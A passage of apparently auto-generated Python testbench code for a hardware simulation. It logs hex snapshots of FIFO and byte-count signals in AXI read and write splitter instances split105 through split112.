logs.log_info("SNP %x tb.dut.split105.axi_wr_4_splitter.back_bid_b_fifo.int_count" % logs.peek("tb.dut.split105.axi_wr_4_splitter.back_bid_b_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split105.axi_wr_4_splitter.back_bid_c_fifo.count" % logs.peek("tb.dut.split105.axi_wr_4_splitter.back_bid_c_fifo.count"))
logs.log_info("SNP %x tb.dut.split105.axi_wr_4_splitter.back_bid_c_fifo.int_count" % logs.peek("tb.dut.split105.axi_wr_4_splitter.back_bid_c_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split105.axi_wr_4_splitter.back_bid_d_fifo.count" % logs.peek("tb.dut.split105.axi_wr_4_splitter.back_bid_d_fifo.count"))
logs.log_info("SNP %x tb.dut.split105.axi_wr_4_splitter.back_bid_d_fifo.int_count" % logs.peek("tb.dut.split105.axi_wr_4_splitter.back_bid_d_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split105.axi_wr_4_splitter.order_fifo.next_count" % logs.peek("tb.dut.split105.axi_wr_4_splitter.order_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split105.axi_wr_4_splitter.order_fifo.count" % logs.peek("tb.dut.split105.axi_wr_4_splitter.order_fifo.count"))
logs.log_info("SNP %x tb.dut.split105.axi_wr_4_splitter.w_fifo.next_count" % logs.peek("tb.dut.split105.axi_wr_4_splitter.w_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split105.axi_wr_4_splitter.w_fifo.count" % logs.peek("tb.dut.split105.axi_wr_4_splitter.w_fifo.count"))
logs.log_info("SNP %x tb.dut.split106.axi_rd_4_splitter.ar_fifo.next_count" % logs.peek("tb.dut.split106.axi_rd_4_splitter.ar_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split106.axi_rd_4_splitter.ar_fifo.count" % logs.peek("tb.dut.split106.axi_rd_4_splitter.ar_fifo.count"))
logs.log_info("SNP %x tb.dut.split106.axi_rd_4_splitter.r_fifo.next_count" % logs.peek("tb.dut.split106.axi_rd_4_splitter.r_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split106.axi_rd_4_splitter.r_fifo.count" % logs.peek("tb.dut.split106.axi_rd_4_splitter.r_fifo.count"))
logs.log_info("SNP %x tb.dut.split106.axi_wr_4_splitter.a_bcount" % logs.peek("tb.dut.split106.axi_wr_4_splitter.a_bcount"))
logs.log_info("SNP %x tb.dut.split106.axi_wr_4_splitter.b_bcount" % logs.peek("tb.dut.split106.axi_wr_4_splitter.b_bcount"))
logs.log_info("SNP %x tb.dut.split106.axi_wr_4_splitter.c_bcount" % logs.peek("tb.dut.split106.axi_wr_4_splitter.c_bcount"))
logs.log_info("SNP %x tb.dut.split106.axi_wr_4_splitter.d_bcount" % logs.peek("tb.dut.split106.axi_wr_4_splitter.d_bcount"))
logs.log_info("SNP %x tb.dut.split106.axi_wr_4_splitter.aw_fifo.next_count" % logs.peek("tb.dut.split106.axi_wr_4_splitter.aw_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split106.axi_wr_4_splitter.aw_fifo.count" % logs.peek("tb.dut.split106.axi_wr_4_splitter.aw_fifo.count"))
logs.log_info("SNP %x tb.dut.split106.axi_wr_4_splitter.b_fifo.next_count" % logs.peek("tb.dut.split106.axi_wr_4_splitter.b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split106.axi_wr_4_splitter.b_fifo.count" % logs.peek("tb.dut.split106.axi_wr_4_splitter.b_fifo.count"))
logs.log_info("SNP %x tb.dut.split106.axi_wr_4_splitter.back_bid_a_fifo.count" % logs.peek("tb.dut.split106.axi_wr_4_splitter.back_bid_a_fifo.count"))
logs.log_info("SNP %x tb.dut.split106.axi_wr_4_splitter.back_bid_a_fifo.int_count" % logs.peek("tb.dut.split106.axi_wr_4_splitter.back_bid_a_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split106.axi_wr_4_splitter.back_bid_b_fifo.count" % logs.peek("tb.dut.split106.axi_wr_4_splitter.back_bid_b_fifo.count"))
logs.log_info("SNP %x tb.dut.split106.axi_wr_4_splitter.back_bid_b_fifo.int_count" % logs.peek("tb.dut.split106.axi_wr_4_splitter.back_bid_b_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split106.axi_wr_4_splitter.back_bid_c_fifo.count" % logs.peek("tb.dut.split106.axi_wr_4_splitter.back_bid_c_fifo.count"))
logs.log_info("SNP %x tb.dut.split106.axi_wr_4_splitter.back_bid_c_fifo.int_count" % logs.peek("tb.dut.split106.axi_wr_4_splitter.back_bid_c_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split106.axi_wr_4_splitter.back_bid_d_fifo.count" % logs.peek("tb.dut.split106.axi_wr_4_splitter.back_bid_d_fifo.count"))
logs.log_info("SNP %x tb.dut.split106.axi_wr_4_splitter.back_bid_d_fifo.int_count" % logs.peek("tb.dut.split106.axi_wr_4_splitter.back_bid_d_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split106.axi_wr_4_splitter.order_fifo.next_count" % logs.peek("tb.dut.split106.axi_wr_4_splitter.order_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split106.axi_wr_4_splitter.order_fifo.count" % logs.peek("tb.dut.split106.axi_wr_4_splitter.order_fifo.count"))
logs.log_info("SNP %x tb.dut.split106.axi_wr_4_splitter.w_fifo.next_count" % logs.peek("tb.dut.split106.axi_wr_4_splitter.w_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split106.axi_wr_4_splitter.w_fifo.count" % logs.peek("tb.dut.split106.axi_wr_4_splitter.w_fifo.count"))
logs.log_info("SNP %x tb.dut.split107.axi_rd_4_splitter.ar_fifo.next_count" % logs.peek("tb.dut.split107.axi_rd_4_splitter.ar_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split107.axi_rd_4_splitter.ar_fifo.count" % logs.peek("tb.dut.split107.axi_rd_4_splitter.ar_fifo.count"))
logs.log_info("SNP %x tb.dut.split107.axi_rd_4_splitter.r_fifo.next_count" % logs.peek("tb.dut.split107.axi_rd_4_splitter.r_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split107.axi_rd_4_splitter.r_fifo.count" % logs.peek("tb.dut.split107.axi_rd_4_splitter.r_fifo.count"))
logs.log_info("SNP %x tb.dut.split107.axi_wr_4_splitter.a_bcount" % logs.peek("tb.dut.split107.axi_wr_4_splitter.a_bcount"))
logs.log_info("SNP %x tb.dut.split107.axi_wr_4_splitter.b_bcount" % logs.peek("tb.dut.split107.axi_wr_4_splitter.b_bcount"))
logs.log_info("SNP %x tb.dut.split107.axi_wr_4_splitter.c_bcount" % logs.peek("tb.dut.split107.axi_wr_4_splitter.c_bcount"))
logs.log_info("SNP %x tb.dut.split107.axi_wr_4_splitter.d_bcount" % logs.peek("tb.dut.split107.axi_wr_4_splitter.d_bcount"))
logs.log_info("SNP %x tb.dut.split107.axi_wr_4_splitter.aw_fifo.next_count" % logs.peek("tb.dut.split107.axi_wr_4_splitter.aw_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split107.axi_wr_4_splitter.aw_fifo.count" % logs.peek("tb.dut.split107.axi_wr_4_splitter.aw_fifo.count"))
logs.log_info("SNP %x tb.dut.split107.axi_wr_4_splitter.b_fifo.next_count" % logs.peek("tb.dut.split107.axi_wr_4_splitter.b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split107.axi_wr_4_splitter.b_fifo.count" % logs.peek("tb.dut.split107.axi_wr_4_splitter.b_fifo.count"))
logs.log_info("SNP %x tb.dut.split107.axi_wr_4_splitter.back_bid_a_fifo.count" % logs.peek("tb.dut.split107.axi_wr_4_splitter.back_bid_a_fifo.count"))
logs.log_info("SNP %x tb.dut.split107.axi_wr_4_splitter.back_bid_a_fifo.int_count" % logs.peek("tb.dut.split107.axi_wr_4_splitter.back_bid_a_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split107.axi_wr_4_splitter.back_bid_b_fifo.count" % logs.peek("tb.dut.split107.axi_wr_4_splitter.back_bid_b_fifo.count"))
logs.log_info("SNP %x tb.dut.split107.axi_wr_4_splitter.back_bid_b_fifo.int_count" % logs.peek("tb.dut.split107.axi_wr_4_splitter.back_bid_b_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split107.axi_wr_4_splitter.back_bid_c_fifo.count" % logs.peek("tb.dut.split107.axi_wr_4_splitter.back_bid_c_fifo.count"))
logs.log_info("SNP %x tb.dut.split107.axi_wr_4_splitter.back_bid_c_fifo.int_count" % logs.peek("tb.dut.split107.axi_wr_4_splitter.back_bid_c_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split107.axi_wr_4_splitter.back_bid_d_fifo.count" % logs.peek("tb.dut.split107.axi_wr_4_splitter.back_bid_d_fifo.count"))
logs.log_info("SNP %x tb.dut.split107.axi_wr_4_splitter.back_bid_d_fifo.int_count" % logs.peek("tb.dut.split107.axi_wr_4_splitter.back_bid_d_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split107.axi_wr_4_splitter.order_fifo.next_count" % logs.peek("tb.dut.split107.axi_wr_4_splitter.order_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split107.axi_wr_4_splitter.order_fifo.count" % logs.peek("tb.dut.split107.axi_wr_4_splitter.order_fifo.count"))
logs.log_info("SNP %x tb.dut.split107.axi_wr_4_splitter.w_fifo.next_count" % logs.peek("tb.dut.split107.axi_wr_4_splitter.w_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split107.axi_wr_4_splitter.w_fifo.count" % logs.peek("tb.dut.split107.axi_wr_4_splitter.w_fifo.count"))
logs.log_info("SNP %x tb.dut.split108.axi_rd_4_splitter.ar_fifo.next_count" % logs.peek("tb.dut.split108.axi_rd_4_splitter.ar_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split108.axi_rd_4_splitter.ar_fifo.count" % logs.peek("tb.dut.split108.axi_rd_4_splitter.ar_fifo.count"))
logs.log_info("SNP %x tb.dut.split108.axi_rd_4_splitter.r_fifo.next_count" % logs.peek("tb.dut.split108.axi_rd_4_splitter.r_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split108.axi_rd_4_splitter.r_fifo.count" % logs.peek("tb.dut.split108.axi_rd_4_splitter.r_fifo.count"))
logs.log_info("SNP %x tb.dut.split108.axi_wr_4_splitter.a_bcount" % logs.peek("tb.dut.split108.axi_wr_4_splitter.a_bcount"))
logs.log_info("SNP %x tb.dut.split108.axi_wr_4_splitter.b_bcount" % logs.peek("tb.dut.split108.axi_wr_4_splitter.b_bcount"))
logs.log_info("SNP %x tb.dut.split108.axi_wr_4_splitter.c_bcount" % logs.peek("tb.dut.split108.axi_wr_4_splitter.c_bcount"))
logs.log_info("SNP %x tb.dut.split108.axi_wr_4_splitter.d_bcount" % logs.peek("tb.dut.split108.axi_wr_4_splitter.d_bcount"))
logs.log_info("SNP %x tb.dut.split108.axi_wr_4_splitter.aw_fifo.next_count" % logs.peek("tb.dut.split108.axi_wr_4_splitter.aw_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split108.axi_wr_4_splitter.aw_fifo.count" % logs.peek("tb.dut.split108.axi_wr_4_splitter.aw_fifo.count"))
logs.log_info("SNP %x tb.dut.split108.axi_wr_4_splitter.b_fifo.next_count" % logs.peek("tb.dut.split108.axi_wr_4_splitter.b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split108.axi_wr_4_splitter.b_fifo.count" % logs.peek("tb.dut.split108.axi_wr_4_splitter.b_fifo.count"))
logs.log_info("SNP %x tb.dut.split108.axi_wr_4_splitter.back_bid_a_fifo.count" % logs.peek("tb.dut.split108.axi_wr_4_splitter.back_bid_a_fifo.count"))
logs.log_info("SNP %x tb.dut.split108.axi_wr_4_splitter.back_bid_a_fifo.int_count" % logs.peek("tb.dut.split108.axi_wr_4_splitter.back_bid_a_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split108.axi_wr_4_splitter.back_bid_b_fifo.count" % logs.peek("tb.dut.split108.axi_wr_4_splitter.back_bid_b_fifo.count"))
logs.log_info("SNP %x tb.dut.split108.axi_wr_4_splitter.back_bid_b_fifo.int_count" % logs.peek("tb.dut.split108.axi_wr_4_splitter.back_bid_b_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split108.axi_wr_4_splitter.back_bid_c_fifo.count" % logs.peek("tb.dut.split108.axi_wr_4_splitter.back_bid_c_fifo.count"))
logs.log_info("SNP %x tb.dut.split108.axi_wr_4_splitter.back_bid_c_fifo.int_count" % logs.peek("tb.dut.split108.axi_wr_4_splitter.back_bid_c_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split108.axi_wr_4_splitter.back_bid_d_fifo.count" % logs.peek("tb.dut.split108.axi_wr_4_splitter.back_bid_d_fifo.count"))
logs.log_info("SNP %x tb.dut.split108.axi_wr_4_splitter.back_bid_d_fifo.int_count" % logs.peek("tb.dut.split108.axi_wr_4_splitter.back_bid_d_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split108.axi_wr_4_splitter.order_fifo.next_count" % logs.peek("tb.dut.split108.axi_wr_4_splitter.order_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split108.axi_wr_4_splitter.order_fifo.count" % logs.peek("tb.dut.split108.axi_wr_4_splitter.order_fifo.count"))
logs.log_info("SNP %x tb.dut.split108.axi_wr_4_splitter.w_fifo.next_count" % logs.peek("tb.dut.split108.axi_wr_4_splitter.w_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split108.axi_wr_4_splitter.w_fifo.count" % logs.peek("tb.dut.split108.axi_wr_4_splitter.w_fifo.count"))
logs.log_info("SNP %x tb.dut.split109.axi_rd_4_splitter.ar_fifo.next_count" % logs.peek("tb.dut.split109.axi_rd_4_splitter.ar_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split109.axi_rd_4_splitter.ar_fifo.count" % logs.peek("tb.dut.split109.axi_rd_4_splitter.ar_fifo.count"))
logs.log_info("SNP %x tb.dut.split109.axi_rd_4_splitter.r_fifo.next_count" % logs.peek("tb.dut.split109.axi_rd_4_splitter.r_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split109.axi_rd_4_splitter.r_fifo.count" % logs.peek("tb.dut.split109.axi_rd_4_splitter.r_fifo.count"))
logs.log_info("SNP %x tb.dut.split109.axi_wr_4_splitter.a_bcount" % logs.peek("tb.dut.split109.axi_wr_4_splitter.a_bcount"))
logs.log_info("SNP %x tb.dut.split109.axi_wr_4_splitter.b_bcount" % logs.peek("tb.dut.split109.axi_wr_4_splitter.b_bcount"))
logs.log_info("SNP %x tb.dut.split109.axi_wr_4_splitter.c_bcount" % logs.peek("tb.dut.split109.axi_wr_4_splitter.c_bcount"))
logs.log_info("SNP %x tb.dut.split109.axi_wr_4_splitter.d_bcount" % logs.peek("tb.dut.split109.axi_wr_4_splitter.d_bcount"))
logs.log_info("SNP %x tb.dut.split109.axi_wr_4_splitter.aw_fifo.next_count" % logs.peek("tb.dut.split109.axi_wr_4_splitter.aw_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split109.axi_wr_4_splitter.aw_fifo.count" % logs.peek("tb.dut.split109.axi_wr_4_splitter.aw_fifo.count"))
logs.log_info("SNP %x tb.dut.split109.axi_wr_4_splitter.b_fifo.next_count" % logs.peek("tb.dut.split109.axi_wr_4_splitter.b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split109.axi_wr_4_splitter.b_fifo.count" % logs.peek("tb.dut.split109.axi_wr_4_splitter.b_fifo.count"))
logs.log_info("SNP %x tb.dut.split109.axi_wr_4_splitter.back_bid_a_fifo.count" % logs.peek("tb.dut.split109.axi_wr_4_splitter.back_bid_a_fifo.count"))
logs.log_info("SNP %x tb.dut.split109.axi_wr_4_splitter.back_bid_a_fifo.int_count" % logs.peek("tb.dut.split109.axi_wr_4_splitter.back_bid_a_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split109.axi_wr_4_splitter.back_bid_b_fifo.count" % logs.peek("tb.dut.split109.axi_wr_4_splitter.back_bid_b_fifo.count"))
logs.log_info("SNP %x tb.dut.split109.axi_wr_4_splitter.back_bid_b_fifo.int_count" % logs.peek("tb.dut.split109.axi_wr_4_splitter.back_bid_b_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split109.axi_wr_4_splitter.back_bid_c_fifo.count" % logs.peek("tb.dut.split109.axi_wr_4_splitter.back_bid_c_fifo.count"))
logs.log_info("SNP %x tb.dut.split109.axi_wr_4_splitter.back_bid_c_fifo.int_count" % logs.peek("tb.dut.split109.axi_wr_4_splitter.back_bid_c_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split109.axi_wr_4_splitter.back_bid_d_fifo.count" % logs.peek("tb.dut.split109.axi_wr_4_splitter.back_bid_d_fifo.count"))
logs.log_info("SNP %x tb.dut.split109.axi_wr_4_splitter.back_bid_d_fifo.int_count" % logs.peek("tb.dut.split109.axi_wr_4_splitter.back_bid_d_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split109.axi_wr_4_splitter.order_fifo.next_count" % logs.peek("tb.dut.split109.axi_wr_4_splitter.order_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split109.axi_wr_4_splitter.order_fifo.count" % logs.peek("tb.dut.split109.axi_wr_4_splitter.order_fifo.count"))
logs.log_info("SNP %x tb.dut.split109.axi_wr_4_splitter.w_fifo.next_count" % logs.peek("tb.dut.split109.axi_wr_4_splitter.w_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split109.axi_wr_4_splitter.w_fifo.count" % logs.peek("tb.dut.split109.axi_wr_4_splitter.w_fifo.count"))
logs.log_info("SNP %x tb.dut.split11.axi_rd_4_splitter.ar_fifo.next_count" % logs.peek("tb.dut.split11.axi_rd_4_splitter.ar_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split11.axi_rd_4_splitter.ar_fifo.count" % logs.peek("tb.dut.split11.axi_rd_4_splitter.ar_fifo.count"))
logs.log_info("SNP %x tb.dut.split11.axi_rd_4_splitter.r_fifo.next_count" % logs.peek("tb.dut.split11.axi_rd_4_splitter.r_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split11.axi_rd_4_splitter.r_fifo.count" % logs.peek("tb.dut.split11.axi_rd_4_splitter.r_fifo.count"))
logs.log_info("SNP %x tb.dut.split11.axi_wr_4_splitter.a_bcount" % logs.peek("tb.dut.split11.axi_wr_4_splitter.a_bcount"))
logs.log_info("SNP %x tb.dut.split11.axi_wr_4_splitter.b_bcount" % logs.peek("tb.dut.split11.axi_wr_4_splitter.b_bcount"))
logs.log_info("SNP %x tb.dut.split11.axi_wr_4_splitter.c_bcount" % logs.peek("tb.dut.split11.axi_wr_4_splitter.c_bcount"))
logs.log_info("SNP %x tb.dut.split11.axi_wr_4_splitter.d_bcount" % logs.peek("tb.dut.split11.axi_wr_4_splitter.d_bcount"))
logs.log_info("SNP %x tb.dut.split11.axi_wr_4_splitter.aw_fifo.next_count" % logs.peek("tb.dut.split11.axi_wr_4_splitter.aw_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split11.axi_wr_4_splitter.aw_fifo.count" % logs.peek("tb.dut.split11.axi_wr_4_splitter.aw_fifo.count"))
logs.log_info("SNP %x tb.dut.split11.axi_wr_4_splitter.b_fifo.next_count" % logs.peek("tb.dut.split11.axi_wr_4_splitter.b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split11.axi_wr_4_splitter.b_fifo.count" % logs.peek("tb.dut.split11.axi_wr_4_splitter.b_fifo.count"))
logs.log_info("SNP %x tb.dut.split11.axi_wr_4_splitter.back_bid_a_fifo.count" % logs.peek("tb.dut.split11.axi_wr_4_splitter.back_bid_a_fifo.count"))
logs.log_info("SNP %x tb.dut.split11.axi_wr_4_splitter.back_bid_a_fifo.int_count" % logs.peek("tb.dut.split11.axi_wr_4_splitter.back_bid_a_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split11.axi_wr_4_splitter.back_bid_b_fifo.count" % logs.peek("tb.dut.split11.axi_wr_4_splitter.back_bid_b_fifo.count"))
logs.log_info("SNP %x tb.dut.split11.axi_wr_4_splitter.back_bid_b_fifo.int_count" % logs.peek("tb.dut.split11.axi_wr_4_splitter.back_bid_b_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split11.axi_wr_4_splitter.back_bid_c_fifo.count" % logs.peek("tb.dut.split11.axi_wr_4_splitter.back_bid_c_fifo.count"))
logs.log_info("SNP %x tb.dut.split11.axi_wr_4_splitter.back_bid_c_fifo.int_count" % logs.peek("tb.dut.split11.axi_wr_4_splitter.back_bid_c_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split11.axi_wr_4_splitter.back_bid_d_fifo.count" % logs.peek("tb.dut.split11.axi_wr_4_splitter.back_bid_d_fifo.count"))
logs.log_info("SNP %x tb.dut.split11.axi_wr_4_splitter.back_bid_d_fifo.int_count" % logs.peek("tb.dut.split11.axi_wr_4_splitter.back_bid_d_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split11.axi_wr_4_splitter.order_fifo.next_count" % logs.peek("tb.dut.split11.axi_wr_4_splitter.order_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split11.axi_wr_4_splitter.order_fifo.count" % logs.peek("tb.dut.split11.axi_wr_4_splitter.order_fifo.count"))
logs.log_info("SNP %x tb.dut.split11.axi_wr_4_splitter.w_fifo.next_count" % logs.peek("tb.dut.split11.axi_wr_4_splitter.w_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split11.axi_wr_4_splitter.w_fifo.count" % logs.peek("tb.dut.split11.axi_wr_4_splitter.w_fifo.count"))
logs.log_info("SNP %x tb.dut.split110.axi_rd_4_splitter.ar_fifo.next_count" % logs.peek("tb.dut.split110.axi_rd_4_splitter.ar_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split110.axi_rd_4_splitter.ar_fifo.count" % logs.peek("tb.dut.split110.axi_rd_4_splitter.ar_fifo.count"))
logs.log_info("SNP %x tb.dut.split110.axi_rd_4_splitter.r_fifo.next_count" % logs.peek("tb.dut.split110.axi_rd_4_splitter.r_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split110.axi_rd_4_splitter.r_fifo.count" % logs.peek("tb.dut.split110.axi_rd_4_splitter.r_fifo.count"))
logs.log_info("SNP %x tb.dut.split110.axi_wr_4_splitter.a_bcount" % logs.peek("tb.dut.split110.axi_wr_4_splitter.a_bcount"))
logs.log_info("SNP %x tb.dut.split110.axi_wr_4_splitter.b_bcount" % logs.peek("tb.dut.split110.axi_wr_4_splitter.b_bcount"))
logs.log_info("SNP %x tb.dut.split110.axi_wr_4_splitter.c_bcount" % logs.peek("tb.dut.split110.axi_wr_4_splitter.c_bcount"))
logs.log_info("SNP %x tb.dut.split110.axi_wr_4_splitter.d_bcount" % logs.peek("tb.dut.split110.axi_wr_4_splitter.d_bcount"))
logs.log_info("SNP %x tb.dut.split110.axi_wr_4_splitter.aw_fifo.next_count" % logs.peek("tb.dut.split110.axi_wr_4_splitter.aw_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split110.axi_wr_4_splitter.aw_fifo.count" % logs.peek("tb.dut.split110.axi_wr_4_splitter.aw_fifo.count"))
logs.log_info("SNP %x tb.dut.split110.axi_wr_4_splitter.b_fifo.next_count" % logs.peek("tb.dut.split110.axi_wr_4_splitter.b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split110.axi_wr_4_splitter.b_fifo.count" % logs.peek("tb.dut.split110.axi_wr_4_splitter.b_fifo.count"))
logs.log_info("SNP %x tb.dut.split110.axi_wr_4_splitter.back_bid_a_fifo.count" % logs.peek("tb.dut.split110.axi_wr_4_splitter.back_bid_a_fifo.count"))
logs.log_info("SNP %x tb.dut.split110.axi_wr_4_splitter.back_bid_a_fifo.int_count" % logs.peek("tb.dut.split110.axi_wr_4_splitter.back_bid_a_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split110.axi_wr_4_splitter.back_bid_b_fifo.count" % logs.peek("tb.dut.split110.axi_wr_4_splitter.back_bid_b_fifo.count"))
logs.log_info("SNP %x tb.dut.split110.axi_wr_4_splitter.back_bid_b_fifo.int_count" % logs.peek("tb.dut.split110.axi_wr_4_splitter.back_bid_b_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split110.axi_wr_4_splitter.back_bid_c_fifo.count" % logs.peek("tb.dut.split110.axi_wr_4_splitter.back_bid_c_fifo.count"))
logs.log_info("SNP %x tb.dut.split110.axi_wr_4_splitter.back_bid_c_fifo.int_count" % logs.peek("tb.dut.split110.axi_wr_4_splitter.back_bid_c_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split110.axi_wr_4_splitter.back_bid_d_fifo.count" % logs.peek("tb.dut.split110.axi_wr_4_splitter.back_bid_d_fifo.count"))
logs.log_info("SNP %x tb.dut.split110.axi_wr_4_splitter.back_bid_d_fifo.int_count" % logs.peek("tb.dut.split110.axi_wr_4_splitter.back_bid_d_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split110.axi_wr_4_splitter.order_fifo.next_count" % logs.peek("tb.dut.split110.axi_wr_4_splitter.order_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split110.axi_wr_4_splitter.order_fifo.count" % logs.peek("tb.dut.split110.axi_wr_4_splitter.order_fifo.count"))
logs.log_info("SNP %x tb.dut.split110.axi_wr_4_splitter.w_fifo.next_count" % logs.peek("tb.dut.split110.axi_wr_4_splitter.w_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split110.axi_wr_4_splitter.w_fifo.count" % logs.peek("tb.dut.split110.axi_wr_4_splitter.w_fifo.count"))
logs.log_info("SNP %x tb.dut.split111.axi_rd_4_splitter.ar_fifo.next_count" % logs.peek("tb.dut.split111.axi_rd_4_splitter.ar_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split111.axi_rd_4_splitter.ar_fifo.count" % logs.peek("tb.dut.split111.axi_rd_4_splitter.ar_fifo.count"))
logs.log_info("SNP %x tb.dut.split111.axi_rd_4_splitter.r_fifo.next_count" % logs.peek("tb.dut.split111.axi_rd_4_splitter.r_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split111.axi_rd_4_splitter.r_fifo.count" % logs.peek("tb.dut.split111.axi_rd_4_splitter.r_fifo.count"))
logs.log_info("SNP %x tb.dut.split111.axi_wr_4_splitter.a_bcount" % logs.peek("tb.dut.split111.axi_wr_4_splitter.a_bcount"))
logs.log_info("SNP %x tb.dut.split111.axi_wr_4_splitter.b_bcount" % logs.peek("tb.dut.split111.axi_wr_4_splitter.b_bcount"))
logs.log_info("SNP %x tb.dut.split111.axi_wr_4_splitter.c_bcount" % logs.peek("tb.dut.split111.axi_wr_4_splitter.c_bcount"))
logs.log_info("SNP %x tb.dut.split111.axi_wr_4_splitter.d_bcount" % logs.peek("tb.dut.split111.axi_wr_4_splitter.d_bcount"))
logs.log_info("SNP %x tb.dut.split111.axi_wr_4_splitter.aw_fifo.next_count" % logs.peek("tb.dut.split111.axi_wr_4_splitter.aw_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split111.axi_wr_4_splitter.aw_fifo.count" % logs.peek("tb.dut.split111.axi_wr_4_splitter.aw_fifo.count"))
logs.log_info("SNP %x tb.dut.split111.axi_wr_4_splitter.b_fifo.next_count" % logs.peek("tb.dut.split111.axi_wr_4_splitter.b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split111.axi_wr_4_splitter.b_fifo.count" % logs.peek("tb.dut.split111.axi_wr_4_splitter.b_fifo.count"))
logs.log_info("SNP %x tb.dut.split111.axi_wr_4_splitter.back_bid_a_fifo.count" % logs.peek("tb.dut.split111.axi_wr_4_splitter.back_bid_a_fifo.count"))
logs.log_info("SNP %x tb.dut.split111.axi_wr_4_splitter.back_bid_a_fifo.int_count" % logs.peek("tb.dut.split111.axi_wr_4_splitter.back_bid_a_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split111.axi_wr_4_splitter.back_bid_b_fifo.count" % logs.peek("tb.dut.split111.axi_wr_4_splitter.back_bid_b_fifo.count"))
logs.log_info("SNP %x tb.dut.split111.axi_wr_4_splitter.back_bid_b_fifo.int_count" % logs.peek("tb.dut.split111.axi_wr_4_splitter.back_bid_b_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split111.axi_wr_4_splitter.back_bid_c_fifo.count" % logs.peek("tb.dut.split111.axi_wr_4_splitter.back_bid_c_fifo.count"))
logs.log_info("SNP %x tb.dut.split111.axi_wr_4_splitter.back_bid_c_fifo.int_count" % logs.peek("tb.dut.split111.axi_wr_4_splitter.back_bid_c_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split111.axi_wr_4_splitter.back_bid_d_fifo.count" % logs.peek("tb.dut.split111.axi_wr_4_splitter.back_bid_d_fifo.count"))
logs.log_info("SNP %x tb.dut.split111.axi_wr_4_splitter.back_bid_d_fifo.int_count" % logs.peek("tb.dut.split111.axi_wr_4_splitter.back_bid_d_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split111.axi_wr_4_splitter.order_fifo.next_count" % logs.peek("tb.dut.split111.axi_wr_4_splitter.order_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split111.axi_wr_4_splitter.order_fifo.count" % logs.peek("tb.dut.split111.axi_wr_4_splitter.order_fifo.count"))
logs.log_info("SNP %x tb.dut.split111.axi_wr_4_splitter.w_fifo.next_count" % logs.peek("tb.dut.split111.axi_wr_4_splitter.w_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split111.axi_wr_4_splitter.w_fifo.count" % logs.peek("tb.dut.split111.axi_wr_4_splitter.w_fifo.count"))
logs.log_info("SNP %x tb.dut.split112.axi_rd_4_splitter.ar_fifo.next_count" % logs.peek("tb.dut.split112.axi_rd_4_splitter.ar_fifo.next_count"))
